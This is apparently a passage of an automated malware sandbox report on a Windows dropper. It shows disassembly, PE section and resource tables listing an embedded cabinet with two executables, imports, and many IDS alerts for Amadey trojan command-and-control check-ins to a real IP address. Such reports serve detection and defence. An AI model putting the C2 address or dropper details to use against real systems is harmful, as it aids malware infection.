                            cmp dword ptr [004088B0h], ebx
                            jne 00007F88B4FD7C4Eh
                            mov dword ptr [004088B0h], esi
                            push 004010C4h
                            push 004010B8h
                            call 00007F88B4FD7D76h
                            pop ecx
                            pop ecx
                            test eax, eax
                            je 00007F88B4FD7C39h
                            mov dword ptr [ebp-04h], FFFFFFFEh
                            mov eax, 000000FFh
                            jmp 00007F88B4FD7D59h
                            mov dword ptr [004081E4h], esi
                            cmp dword ptr [004088B0h], esi
                            jne 00007F88B4FD7C3Dh
                            push 004010B4h
                            push 004010ACh
                            call 00007F88B4FD8305h
                            pop ecx
                            pop ecx
                            mov dword ptr [000088B0h], 00000000h
                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0xa28c0xb4.idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x85ce8.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x920000x888.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x14100x54.text
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x10080x40.text
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0xa0000x288.idata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000x63140x6400False0.5744140625data6.314163792045976IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .data0x80000x1a480x200False0.609375data4.970639543960129IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .idata0xa0000x10520x1200False0.4140625data5.025949912909207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .rsrc0xc0000x860000x85e00False0.9305920284780579data7.87144868718461IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc0x920000x8880xa00False0.746484375data6.222637930812128IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            NameRVASizeTypeLanguageCountry
                            AVI0xcb300x2e1aRIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bppEnglishUnited States
                            RT_ICON0xf94c0x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States
                            RT_ICON0xffb40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States
                            RT_ICON0x1029c0x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishUnited States
                            RT_ICON0x104840x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States
                            RT_ICON0x105ac0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States
                            RT_ICON0x114540x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States
                            RT_ICON0x11cfc0x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States
                            RT_ICON0x123c40x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States
                            RT_ICON0x1292c0xd9d2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                            RT_ICON0x203000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States
                            RT_ICON0x228a80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States
                            RT_ICON0x239500x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States
                            RT_ICON0x242d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States
                            RT_DIALOG0x247400x2f2dataEnglishUnited States
                            RT_DIALOG0x24a340x35cdataRussianRussia
                            RT_DIALOG0x24d900x1b0dataEnglishUnited States
                            RT_DIALOG0x24f400x1b4dataRussianRussia
                            RT_DIALOG0x250f40x166dataEnglishUnited States
                            RT_DIALOG0x2525c0x168dataRussianRussia
                            RT_DIALOG0x253c40x1c0dataEnglishUnited States
                            RT_DIALOG0x255840x1e0dataRussianRussia
                            RT_DIALOG0x257640x130dataEnglishUnited States
                            RT_DIALOG0x258940x150dataRussianRussia
                            RT_DIALOG0x259e40x120dataEnglishUnited States
                            RT_DIALOG0x25b040x122dataRussianRussia
                            RT_STRING0x25c280x8cMatlab v4 mat-file (little endian) l, numeric, rows 0, columns 0EnglishUnited States
                            RT_STRING0x25cb40x86Matlab v4 mat-file (little endian) K\0041\0045\004@\0048\004B\0045\004 , numeric, rows 0, columns 0RussianRussia
                            RT_STRING0x25d3c0x520dataEnglishUnited States
                            RT_STRING0x2625c0x52edataRussianRussia
                            RT_STRING0x2678c0x5ccdataEnglishUnited States
                            RT_STRING0x26d580x592dataRussianRussia
                            RT_STRING0x272ec0x4b0dataEnglishUnited States
                            RT_STRING0x2779c0x4b2dataRussianRussia
                            RT_STRING0x27c500x44adataEnglishUnited States
                            RT_STRING0x2809c0x43edataRussianRussia
                            RT_STRING0x284dc0x3cedataEnglishUnited States
                            RT_STRING0x288ac0x2fcdataRussianRussia
                            RT_RCDATA0x28ba80x7ASCII text, with no line terminatorsEnglishUnited States
                            RT_RCDATA0x28bb00x6800cMicrosoft Cabinet archive data, many, 425996 bytes, 2 files, at 0x2c +A "bmKg.exe" +A "xriv.exe", ID 1578, number 1, 20 datablocks, 0x1503 compressionEnglishUnited States
                            RT_RCDATA0x90bbc0x4dataEnglishUnited States
                            RT_RCDATA0x90bc00x24dataEnglishUnited States
                            RT_RCDATA0x90be40x7ASCII text, with no line terminatorsEnglishUnited States
                            RT_RCDATA0x90bec0x7ASCII text, with no line terminatorsEnglishUnited States
                            RT_RCDATA0x90bf40x4dataEnglishUnited States
                            RT_RCDATA0x90bf80x9ASCII text, with no line terminatorsEnglishUnited States
                            RT_RCDATA0x90c040x4dataEnglishUnited States
                            RT_RCDATA0x90c080x9ASCII text, with no line terminatorsEnglishUnited States
                            RT_RCDATA0x90c140x4dataEnglishUnited States
                            RT_RCDATA0x90c180x6dataEnglishUnited States
                            RT_RCDATA0x90c200x7ASCII text, with no line terminatorsEnglishUnited States
                            RT_RCDATA0x90c280x7ASCII text, with no line terminatorsEnglishUnited States
                            RT_GROUP_ICON0x90c300xbcdataEnglishUnited States
                            RT_VERSION0x90cec0x408dataEnglishUnited States
                            RT_VERSION0x910f40x410dataRussianRussia
                            RT_MANIFEST0x915040x7e2XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States
                            DLLImport
                            ADVAPI32.dllGetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
                            KERNEL32.dll_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, lstrcmpA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, ExpandEnvironmentStringsA, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, FindNextFileA, LocalAlloc, GetShortPathNameA, MulDiv, GetDiskFreeSpaceA, EnumResourceLanguagesA, GetTickCount, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, Sleep, FindClose, GetCurrentProcess, FindFirstFileA, WaitForSingleObject, GetModuleFileNameA, LoadLibraryExA
                            GDI32.dllGetDeviceCaps
                            USER32.dllSetWindowLongA, GetDlgItemTextA, DialogBoxIndirectParamA, ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetDesktopWindow, CharUpperA, SetDlgItemTextA, ExitWindowsEx, MessageBeep, EndDialog, CharPrevA, LoadStringA, CharNextA, EnableWindow, ReleaseDC, SetForegroundWindow, PeekMessageA, GetDlgItem, SendMessageA, SendDlgItemMessageA, MessageBoxA, SetWindowTextA, GetWindowLongA, CallWindowProcA, GetSystemMetrics
                            msvcrt.dll_controlfp, ?terminate@@YAXXZ, _acmdln, _initterm, __setusermatherr, _except_handler4_common, memcpy, _ismbblead, __p__fmode, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, __p__commode, _XcptFilter, memcpy_s, _vsnprintf, memset
                            COMCTL32.dll
                            Cabinet.dll
                            VERSION.dllGetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA
                            Language of compilation systemCountry where language is spokenMap
                            EnglishUnited States
                            RussianRussia
                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                            192.168.2.462.204.41.449959802027700 02/08/23-17:38:41.059224TCP2027700ET TROJAN Amadey CnC Check-In4995980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450094802027700 02/08/23-17:39:19.127296TCP2027700ET TROJAN Amadey CnC Check-In5009480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450226802027700 02/08/23-17:39:53.716250TCP2027700ET TROJAN Amadey CnC Check-In5022680192.168.2.462.204.41.4
                            192.168.2.462.204.41.449705802027700 02/08/23-17:37:26.868385TCP2027700ET TROJAN Amadey CnC Check-In4970580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450033802027700 02/08/23-17:39:04.293934TCP2027700ET TROJAN Amadey CnC Check-In5003380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450287802027700 02/08/23-17:40:08.597775TCP2027700ET TROJAN Amadey CnC Check-In5028780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450128802027700 02/08/23-17:39:27.718211TCP2027700ET TROJAN Amadey CnC Check-In5012880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450324802027700 02/08/23-17:40:19.866231TCP2027700ET TROJAN Amadey CnC Check-In5032480192.168.2.462.204.41.4
                            192.168.2.462.204.41.449766802027700 02/08/23-17:37:44.075524TCP2027700ET TROJAN Amadey CnC Check-In4976680192.168.2.462.204.41.4
                            192.168.2.462.204.41.449864802027700 02/08/23-17:38:16.250245TCP2027700ET TROJAN Amadey CnC Check-In4986480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450131802027700 02/08/23-17:39:28.471918TCP2027700ET TROJAN Amadey CnC Check-In5013180192.168.2.462.204.41.4
                            192.168.2.462.204.41.450189802027700 02/08/23-17:39:44.828385TCP2027700ET TROJAN Amadey CnC Check-In5018980192.168.2.462.204.41.4
                            192.168.2.462.204.41.449803802027700 02/08/23-17:37:55.306674TCP2027700ET TROJAN Amadey CnC Check-In4980380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449901802027700 02/08/23-17:38:25.224383TCP2027700ET TROJAN Amadey CnC Check-In4990180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449892802027700 02/08/23-17:38:23.070647TCP2027700ET TROJAN Amadey CnC Check-In4989280192.168.2.462.204.41.4
                            192.168.2.462.204.41.449990802027700 02/08/23-17:38:53.902748TCP2027700ET TROJAN Amadey CnC Check-In4999080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450061802027700 02/08/23-17:39:11.150219TCP2027700ET TROJAN Amadey CnC Check-In5006180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449799802027700 02/08/23-17:37:53.714298TCP2027700ET TROJAN Amadey CnC Check-In4979980192.168.2.462.204.41.4
                            192.168.2.462.204.41.449897802027700 02/08/23-17:38:24.270543TCP2027700ET TROJAN Amadey CnC Check-In4989780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449794802027700 02/08/23-17:37:50.997871TCP2027700ET TROJAN Amadey CnC Check-In4979480192.168.2.462.204.41.4
                            192.168.2.462.204.41.449738802027700 02/08/23-17:37:37.329606TCP2027700ET TROJAN Amadey CnC Check-In4973880192.168.2.462.204.41.4
                            192.168.2.462.204.41.449836802027700 02/08/23-17:38:03.530213TCP2027700ET TROJAN Amadey CnC Check-In4983680192.168.2.462.204.41.4
                            192.168.2.462.204.41.449934802027700 02/08/23-17:38:35.008002TCP2027700ET TROJAN Amadey CnC Check-In4993480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450066802027700 02/08/23-17:39:12.352601TCP2027700ET TROJAN Amadey CnC Check-In5006680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450164802027700 02/08/23-17:39:36.434453TCP2027700ET TROJAN Amadey CnC Check-In5016480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450262802027700 02/08/23-17:40:02.469570TCP2027700ET TROJAN Amadey CnC Check-In5026280192.168.2.462.204.41.4
                            192.168.2.462.204.41.449741802027700 02/08/23-17:37:38.059835TCP2027700ET TROJAN Amadey CnC Check-In4974180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449995802027700 02/08/23-17:38:55.087422TCP2027700ET TROJAN Amadey CnC Check-In4999580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450156802027700 02/08/23-17:39:34.495754TCP2027700ET TROJAN Amadey CnC Check-In5015680192.168.2.462.204.41.4
                            192.168.2.462.204.41.449987802027700 02/08/23-17:38:52.696926TCP2027700ET TROJAN Amadey CnC Check-In4998780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450103802027700 02/08/23-17:39:21.322750TCP2027700ET TROJAN Amadey CnC Check-In5010380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449733802027700 02/08/23-17:37:36.045612TCP2027700ET TROJAN Amadey CnC Check-In4973380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449869802027700 02/08/23-17:38:17.481259TCP2027700ET TROJAN Amadey CnC Check-In4986980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450197802027700 02/08/23-17:39:46.717263TCP2027700ET TROJAN Amadey CnC Check-In5019780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450329802027700 02/08/23-17:40:21.110664TCP2027700ET TROJAN Amadey CnC Check-In5032980192.168.2.462.204.41.4
                            192.168.2.462.204.41.449906802027700 02/08/23-17:38:26.442985TCP2027700ET TROJAN Amadey CnC Check-In4990680192.168.2.462.204.41.4
                            192.168.2.462.204.41.449811802027700 02/08/23-17:37:57.197655TCP2027700ET TROJAN Amadey CnC Check-In4981180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449828802027700 02/08/23-17:38:01.248597TCP2027700ET TROJAN Amadey CnC Check-In4982880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450038802027700 02/08/23-17:39:05.523813TCP2027700ET TROJAN Amadey CnC Check-In5003880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450192802027700 02/08/23-17:39:45.528132TCP2027700ET TROJAN Amadey CnC Check-In5019280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450234802027700 02/08/23-17:39:55.624345TCP2027700ET TROJAN Amadey CnC Check-In5023480192.168.2.462.204.41.4
                            192.168.2.462.204.41.449921802027700 02/08/23-17:38:30.054351TCP2027700ET TROJAN Amadey CnC Check-In4992180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449786802027700 02/08/23-17:37:48.848861TCP2027700ET TROJAN Amadey CnC Check-In4978680192.168.2.462.204.41.4
                            192.168.2.462.204.41.449884802027700 02/08/23-17:38:21.133806TCP2027700ET TROJAN Amadey CnC Check-In4988480192.168.2.462.204.41.4
                            192.168.2.462.204.41.449746802027700 02/08/23-17:37:39.277464TCP2027700ET TROJAN Amadey CnC Check-In4974680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450013802027700 02/08/23-17:38:59.416856TCP2027700ET TROJAN Amadey CnC Check-In5001380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450074802027700 02/08/23-17:39:14.260435TCP2027700ET TROJAN Amadey CnC Check-In5007480192.168.2.462.204.41.4
                            192.168.2.462.204.41.449918802027700 02/08/23-17:38:29.354200TCP2027700ET TROJAN Amadey CnC Check-In4991880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450246802027700 02/08/23-17:39:58.556275TCP2027700ET TROJAN Amadey CnC Check-In5024680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450267802027700 02/08/23-17:40:03.678070TCP2027700ET TROJAN Amadey CnC Check-In5026780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449970802027700 02/08/23-17:38:46.821273TCP2027700ET TROJAN Amadey CnC Check-In4997080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450218802027700 02/08/23-17:39:51.780000TCP2027700ET TROJAN Amadey CnC Check-In5021880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450184802027700 02/08/23-17:39:43.643716TCP2027700ET TROJAN Amadey CnC Check-In5018480192.168.2.462.204.41.4
                            192.168.2.462.204.41.449954802027700 02/08/23-17:38:39.826367TCP2027700ET TROJAN Amadey CnC Check-In4995480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450282802027700 02/08/23-17:40:07.406029TCP2027700ET TROJAN Amadey CnC Check-In5028280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450111802027700 02/08/23-17:39:23.277592TCP2027700ET TROJAN Amadey CnC Check-In5011180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449856802027700 02/08/23-17:38:12.965502TCP2027700ET TROJAN Amadey CnC Check-In4985680192.168.2.462.204.41.4
                            192.168.2.462.204.41.449700802027700 02/08/23-17:37:25.618450TCP2027700ET TROJAN Amadey CnC Check-In4970080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449939802027700 02/08/23-17:38:36.225912TCP2027700ET TROJAN Amadey CnC Check-In4993980192.168.2.462.204.41.4
                            192.168.2.462.204.41.449851802027700 02/08/23-17:38:10.567171TCP2027700ET TROJAN Amadey CnC Check-In4985180192.168.2.462.204.41.4
                            192.168.2.462.204.41.450221802027700 02/08/23-17:39:52.520097TCP2027700ET TROJAN Amadey CnC Check-In5022180192.168.2.462.204.41.4
                            192.168.2.462.204.41.450304802027700 02/08/23-17:40:12.743685TCP2027700ET TROJAN Amadey CnC Check-In5030480192.168.2.462.204.41.4
                            192.168.2.462.204.41.449848802027700 02/08/23-17:38:09.783238TCP2027700ET TROJAN Amadey CnC Check-In4984880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450176802027700 02/08/23-17:39:39.790671TCP2027700ET TROJAN Amadey CnC Check-In5017680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450337802027700 02/08/23-17:40:23.085156TCP2027700ET TROJAN Amadey CnC Check-In5033780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450046802027700 02/08/23-17:39:07.465500TCP2027700ET TROJAN Amadey CnC Check-In5004680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450213802027700 02/08/23-17:39:50.554966TCP2027700ET TROJAN Amadey CnC Check-In5021380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449889802027700 02/08/23-17:38:22.355002TCP2027700ET TROJAN Amadey CnC Check-In4988980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450005802027700 02/08/23-17:38:57.463506TCP2027700ET TROJAN Amadey CnC Check-In5000580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450254802027700 02/08/23-17:40:00.514767TCP2027700ET TROJAN Amadey CnC Check-In5025480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450259802027700 02/08/23-17:40:01.724392TCP2027700ET TROJAN Amadey CnC Check-In5025980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450000802027700 02/08/23-17:38:56.276223TCP2027700ET TROJAN Amadey CnC Check-In5000080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449718802027700 02/08/23-17:37:30.060143TCP2027700ET TROJAN Amadey CnC Check-In4971880192.168.2.462.204.41.4
                            192.168.2.462.204.41.449967802027700 02/08/23-17:38:46.093677TCP2027700ET TROJAN Amadey CnC Check-In4996780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450295802027700 02/08/23-17:40:10.522022TCP2027700ET TROJAN Amadey CnC Check-In5029580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450041802027700 02/08/23-17:39:06.234295TCP2027700ET TROJAN Amadey CnC Check-In5004180192.168.2.462.204.41.4
                            192.168.2.462.204.41.450018802027700 02/08/23-17:39:00.633703TCP2027700ET TROJAN Amadey CnC Check-In5001880192.168.2.462.204.41.4
                            192.168.2.462.204.41.449713802027700 02/08/23-17:37:28.821552TCP2027700ET TROJAN Amadey CnC Check-In4971380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449926802027700 02/08/23-17:38:31.519366TCP2027700ET TROJAN Amadey CnC Check-In4992680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450148802027700 02/08/23-17:39:32.593659TCP2027700ET TROJAN Amadey CnC Check-In5014880192.168.2.462.204.41.4
                            192.168.2.462.204.41.449754802027700 02/08/23-17:37:41.168561TCP2027700ET TROJAN Amadey CnC Check-In4975480192.168.2.462.204.41.4
                            192.168.2.462.204.41.449962802027700 02/08/23-17:38:41.870045TCP2027700ET TROJAN Amadey CnC Check-In4996280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450290802027700 02/08/23-17:40:09.328461TCP2027700ET TROJAN Amadey CnC Check-In5029080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450332802027700 02/08/23-17:40:21.859053TCP2027700ET TROJAN Amadey CnC Check-In5033280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450180802027700 02/08/23-17:39:42.064684TCP2027700ET TROJAN Amadey CnC Check-In5018080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450082802027700 02/08/23-17:39:16.214186TCP2027700ET TROJAN Amadey CnC Check-In5008280192.168.2.462.204.41.4
                            192.168.2.462.204.41.449876802027700 02/08/23-17:38:19.187751TCP2027700ET TROJAN Amadey CnC Check-In4987680192.168.2.462.204.41.4
                            192.168.2.462.204.41.449974802027700 02/08/23-17:38:47.760275TCP2027700ET TROJAN Amadey CnC Check-In4997480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450171802027700 02/08/23-17:39:38.199718TCP2027700ET TROJAN Amadey CnC Check-In5017180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449787802027700 02/08/23-17:37:49.088688TCP2027700ET TROJAN Amadey CnC Check-In4978780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449726802027700 02/08/23-17:37:33.198314TCP2027700ET TROJAN Amadey CnC Check-In4972680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450152802027700 02/08/23-17:39:33.546078TCP2027700ET TROJAN Amadey CnC Check-In5015280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450241802027700 02/08/23-17:39:57.341359TCP2027700ET TROJAN Amadey CnC Check-In5024180192.168.2.462.204.41.4
                            192.168.2.462.204.41.450250802027700 02/08/23-17:39:59.546506TCP2027700ET TROJAN Amadey CnC Check-In5025080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449717802027700 02/08/23-17:37:29.811373TCP2027700ET TROJAN Amadey CnC Check-In4971780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449815802027700 02/08/23-17:37:58.137635TCP2027700ET TROJAN Amadey CnC Check-In4981580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450238802027700 02/08/23-17:39:56.593363TCP2027700ET TROJAN Amadey CnC Check-In5023880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450149802027700 02/08/23-17:39:32.825800TCP2027700ET TROJAN Amadey CnC Check-In5014980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450247802027700 02/08/23-17:39:58.822362TCP2027700ET TROJAN Amadey CnC Check-In5024780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450336802027700 02/08/23-17:40:22.842207TCP2027700ET TROJAN Amadey CnC Check-In5033680192.168.2.462.204.41.4
                            192.168.2.462.204.41.449816802027700 02/08/23-17:37:58.374846TCP2027700ET TROJAN Amadey CnC Check-In4981680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450078802027700 02/08/23-17:39:15.231604TCP2027700ET TROJAN Amadey CnC Check-In5007880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450311802027700 02/08/23-17:40:15.296990TCP2027700ET TROJAN Amadey CnC Check-In5031180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449905802027700 02/08/23-17:38:26.197219TCP2027700ET TROJAN Amadey CnC Check-In4990580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449946802027700 02/08/23-17:38:37.915361TCP2027700ET TROJAN Amadey CnC Check-In4994680192.168.2.462.204.41.4
                            192.168.2.462.204.41.449857802027700 02/08/23-17:38:13.235521TCP2027700ET TROJAN Amadey CnC Check-In4985780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449983802027700 02/08/23-17:38:50.645662TCP2027700ET TROJAN Amadey CnC Check-In4998380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450168802027700 02/08/23-17:39:37.476154TCP2027700ET TROJAN Amadey CnC Check-In5016880192.168.2.462.204.41.4
                            192.168.2.462.204.41.449745802027700 02/08/23-17:37:39.033150TCP2027700ET TROJAN Amadey CnC Check-In4974580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450222802027700 02/08/23-17:39:52.771625TCP2027700ET TROJAN Amadey CnC Check-In5022280192.168.2.462.204.41.4
                            192.168.2.462.204.41.449999802027700 02/08/23-17:38:56.038686TCP2027700ET TROJAN Amadey CnC Check-In4999980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450009802027700 02/08/23-17:38:58.446402TCP2027700ET TROJAN Amadey CnC Check-In5000980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450275802027700 02/08/23-17:40:05.702720TCP2027700ET TROJAN Amadey CnC Check-In5027580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450317802027700 02/08/23-17:40:18.173072TCP2027700ET TROJAN Amadey CnC Check-In5031780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450079802027700 02/08/23-17:39:15.474751TCP2027700ET TROJAN Amadey CnC Check-In5007980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450151802027700 02/08/23-17:39:33.307816TCP2027700ET TROJAN Amadey CnC Check-In5015180192.168.2.462.204.41.4
                            192.168.2.462.204.41.450110802027700 02/08/23-17:39:23.028270TCP2027700ET TROJAN Amadey CnC Check-In5011080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450021802027700 02/08/23-17:39:01.371725TCP2027700ET TROJAN Amadey CnC Check-In5002180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449927802027700 02/08/23-17:38:32.329981TCP2027700ET TROJAN Amadey CnC Check-In4992780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450062802027700 02/08/23-17:39:11.394661TCP2027700ET TROJAN Amadey CnC Check-In5006280192.168.2.462.204.41.4
                            192.168.2.462.204.41.449933802027700 02/08/23-17:38:34.763685TCP2027700ET TROJAN Amadey CnC Check-In4993380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449872802027700 02/08/23-17:38:18.196909TCP2027700ET TROJAN Amadey CnC Check-In4987280192.168.2.462.204.41.4
                            192.168.2.462.204.41.449942802027700 02/08/23-17:38:36.933202TCP2027700ET TROJAN Amadey CnC Check-In4994280192.168.2.462.204.41.4
                            192.168.2.462.204.41.449774802027700 02/08/23-17:37:45.979162TCP2027700ET TROJAN Amadey CnC Check-In4977480192.168.2.462.204.41.4
                            192.168.2.462.204.41.449844802027700 02/08/23-17:38:08.504141TCP2027700ET TROJAN Amadey CnC Check-In4984480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450025802027700 02/08/23-17:39:02.337619TCP2027700ET TROJAN Amadey CnC Check-In5002580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449863802027700 02/08/23-17:38:16.006053TCP2027700ET TROJAN Amadey CnC Check-In4986380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449961802027700 02/08/23-17:38:41.634574TCP2027700ET TROJAN Amadey CnC Check-In4996180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449758802027700 02/08/23-17:37:42.136397TCP2027700ET TROJAN Amadey CnC Check-In4975880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450034802027700 02/08/23-17:39:04.545459TCP2027700ET TROJAN Amadey CnC Check-In5003480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450196802027700 02/08/23-17:39:46.473903TCP2027700ET TROJAN Amadey CnC Check-In5019680192.168.2.462.204.41.4
